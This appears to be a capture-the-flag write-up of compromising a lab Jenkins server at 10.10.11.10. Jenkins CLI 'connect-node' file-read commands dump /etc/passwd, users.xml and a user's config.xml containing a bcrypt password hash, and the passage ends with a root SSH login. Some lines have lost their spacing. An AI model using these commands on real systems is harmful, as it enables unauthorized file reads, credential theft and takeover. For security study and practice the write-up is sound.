Hmmm, we are just getting a single line.... We can use help and list all the commands to see what commands can help us to get how many lines.
My guess: the reason we have different size output with different command is because a particular command has that length of expected output size. I.e enable job i used above might give True or False or some other output that is of 1 line only.
Anyway let's continue with trying a perfect command that will result many lines. For this purpose I wrote a python script (yeah ippsec way didn't work for my shell)
I found out that connect node has max number of output lines
java -jar jenkins-cli.jar -s http://10.10.11.10:8080 connect-node '@/etc/passwd' [5]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin: No such agent "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" exists.
root:x:0:0:root:/root:/bin/bash:Nosuchagent"root:x:0:0:root:/root:/bin/bash"exists.mail:x:8:8:mail:/var/mail:/usr/sbin/nologin:Nosuchagent"mail:x:8:8:mail:/var/mail:/usr/sbin/nologin"exists.backup:x:34:34:backup:/var/backups:/usr/sbin/nologin: No such agent "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" exists.
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin: No such agent "_apt:x:42:65534::/nonexistent:/usr/sbin/nologin" exists.
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin: No such agent "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin" exists.
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin:Nosuchagent"lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin"exists.uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin: No such agent "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" exists.
bin:x:2:2:bin:/bin:/usr/sbin/nologin:Nosuchagent"bin:x:2:2:bin:/bin:/usr/sbin/nologin"exists.news:x:9:9:news:/var/spool/news:/usr/sbin/nologin: No such agent "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" exists.
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin:Nosuchagent"proxy:x:13:13:proxy:/bin:/usr/sbin/nologin"exists.irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin:Nosuchagent"irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin"exists.list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin: No such agent "list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin" exists.
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash: No such agent "jenkins:x:1000:1000::/var/jenkins_home:/bin/bash" exists.
games:x:5:60:games:/usr/games:/usr/sbin/nologin: No such agent "games:x:5:60:games:/usr/games:/usr/sbin/nologin" exists.
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin: No such agent "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" exists.
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin: No such agent "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" exists.
sys:x:3:3:sys:/dev:/usr/sbin/nologin:Nosuchagent"sys:x:3:3:sys:/dev:/usr/sbin/nologin"exists.sync:x:4:65534:sync:/bin:/bin/sync:Nosuchagent"sync:x:4:65534:sync:/bin:/bin/sync"exists.ERROR:Erroroccurredwhileperformingthiscommand,seepreviousstderroutput.
we found 2 users
java-jarjenkins-cli.jar-shttp://10.10.11.10:8080connect-node'@/etc/passwd'2>&1|grepshroot:x:0:0:root:/root:/bin/bash:Nosuchagent"root:x:0:0:root:/root:/bin/bash"exists.jenkins:x:1000:1000::/var/jenkins_home:/bin/bash: No such agent "jenkins:x:1000:1000::/var/jenkins_home:/bin/bash" exists.
I tired to get ssh private key from this, but no luck
Upon searching the directory structure of Jenkins and how it store files, I found this blog:
I could have done like ippsec way : To pull dockerfile and install jenkins and look at the directory structure, but I didn't wanna install things lol.
If we looked at users part in the blog
the users.xml file seem intresting
java -jar jenkins-cli.jar -s http://10.10.11.10:8080 connect-node '@/var/jenkins_home/users/users.xml' 2>&1 [5]
<?xml version='1.1' encoding='UTF-8'?>:Nosuchagent"<?xml version='1.1' encoding='UTF-8'?>"exists. <string>jennifer_12108429903186576833</string>: No such agent " <string>jennifer_12108429903186576833</string>" exists.
<idToDirectoryNameMap class="concurrent-hash-map">: No such agent " <idToDirectoryNameMap class="concurrent-hash-map">" exists.
<entry>:Nosuchagent" <entry>"exists.<string>jennifer</string>: Nosuchagent" <string>jennifer</string>"exists.<version>1</version>: Nosuchagent" <version>1</version>"exists.</hudson.model.UserIdMapper>: No such agent "</hudson.model.UserIdMapper>" exists.</idToDirectoryNameMap>:Nosuchagent" </idToDirectoryNameMap>"exists.<hudson.model.UserIdMapper>: No such agent "<hudson.model.UserIdMapper>" exists.</entry>:Nosuchagent" </entry>"exists.ERROR:Erroroccurredwhileperformingthiscommand,seepreviousstderroutput.
We get the username: jennifer_12108429903186576833
Now we can get password inside file: /var/jenkins_home/users/jennifer_12108429903186576833/config.xml
java -jar jenkins-cli.jar -s http://10.10.11.10:8080 connect-node '@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml' 2>&1 [2]
<<--SNIPPED-->> <fullName>jennifer</fullName>: No such agent " <fullName>jennifer</fullName>" exists. <seed>6841d11dc1de101d</seed>: No such agent " <seed>6841d11dc1de101d</seed>" exists. <id>jennifer</id>: No such agent " <id>jennifer</id>" exists. <version>10</version>: No such agent " <version>10</version>" exists. <tokenStore>: No such agent " <tokenStore>" exists. <filterExecutors>false</filterExecutors>: No such agent " <filterExecutors>false</filterExecutors>" exists.
<io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>: No such agent " <io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>" exists.
<passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>: No such agent " <passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>" exists.
ERROR: Error occurred while performing this command, see previous stderr output.
We can see the ssh hashed key can be decrypted using:
Going back to the script console we can run the command provided and get private key
Root
We can save and login root with the above key.
└─➜nvimid_rsa#paste the key inside id_rsa file└─➜chmod400id_rsa#permission must be changed before ssh'ing
└─➜ ssh root@10.10.11.10 -i id_rsa [130]
Theauthenticityofhost'10.10.11.10 (10.10.11.10)'can't be established.ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.11.10' (ED25519) to the list of known hosts.Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-94-generic x86_64)<SNIP>Last login: Mon Feb 12 13:15:44 2024 from 10.10.14.40root@builder:~# iduid=0(root) gid=0(root) groups=0(root)root@builder:~# cd /rootroot@builder:~# lsroot.txtroot@builder:~# cat root.txt4ad98<<--SNIPPED-->>56eb1ab7root@builder:~#